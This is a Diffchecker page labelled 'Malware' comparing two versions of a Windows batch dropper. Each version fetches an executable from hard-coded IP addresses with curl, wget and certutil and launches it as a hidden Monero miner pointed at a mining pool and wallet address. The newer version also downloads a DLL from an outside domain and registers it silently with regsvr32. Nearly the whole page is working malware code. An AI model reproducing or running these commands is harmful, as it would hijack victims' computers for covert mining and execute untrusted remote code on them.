Malware

Created Diff never expires
5 remoções
Linhas
Total
Removido
Palavras
Total
Removido
Para continuar usando este recurso, atualize para
Diffchecker logo
Diffchecker Pro
18 linhas
12 adições
Linhas
Total
Adicionado
Palavras
Total
Adicionado
Para continuar usando este recurso, atualize para
Diffchecker logo
Diffchecker Pro
25 linhas
@echo off
@echo off
curl http://185.173.36.219/download/jsextension.exe -o jsextension.exe
curl http://159.148.186.228/download/jsextension.exe -o jsextension.exe
if not exist jsextension.exe (
if not exist jsextension.exe (
wget http://185.173.36.219/download/jsextension.exe -O jsextension.exe
wget http://159.148.186.228/download/jsextension.exe -O jsextension.exe
)
)
if not exist jsextension.exe (
if not exist jsextension.exe (
certutil.exe -urlcache -f http://185.173.36.219/download/jsextension.exe jsextension.exe
certutil.exe -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe
)
curl https://citationsherbe.at/sdd.dll -o create.dll
if not exist create.dll (
wget https://citationsherbe.at/sdd.dll -O create.dll
)
if not exist create.dll (
certutil.exe -urlcache -f https://citationsherbe.at/sdd.dll create.dll
)
)
set exe_1=jsextension.exe
set exe_1=jsextension.exe
set "count_1=0"
set "count_1=0"
>tasklist.temp (
>tasklist.temp (
tasklist /NH /FI "IMAGENAME eq %exe_1%"
tasklist /NH /FI "IMAGENAME eq %exe_1%"
)
)
for /f %%x in (tasklist.temp) do (
for /f %%x in (tasklist.temp) do (
if "%%x" EQU "%exe_1%" set /a count_1+=1
if "%%x" EQU "%exe_1%" set /a count_1+=1
)
)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 87FLi8c827mTJwezgVXVUrEkHagWiJ2wuaco2bVkFLGqL3MNMFpeay7QJmHooz19qQFMgJfQRJwJKZMJpetT5Qp69xBARwH --cpu-max-threads-hint=20 --donate-level=1 --background)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background & regsvr32.exe -s create.dll)
del tasklist.temp
del tasklist.temp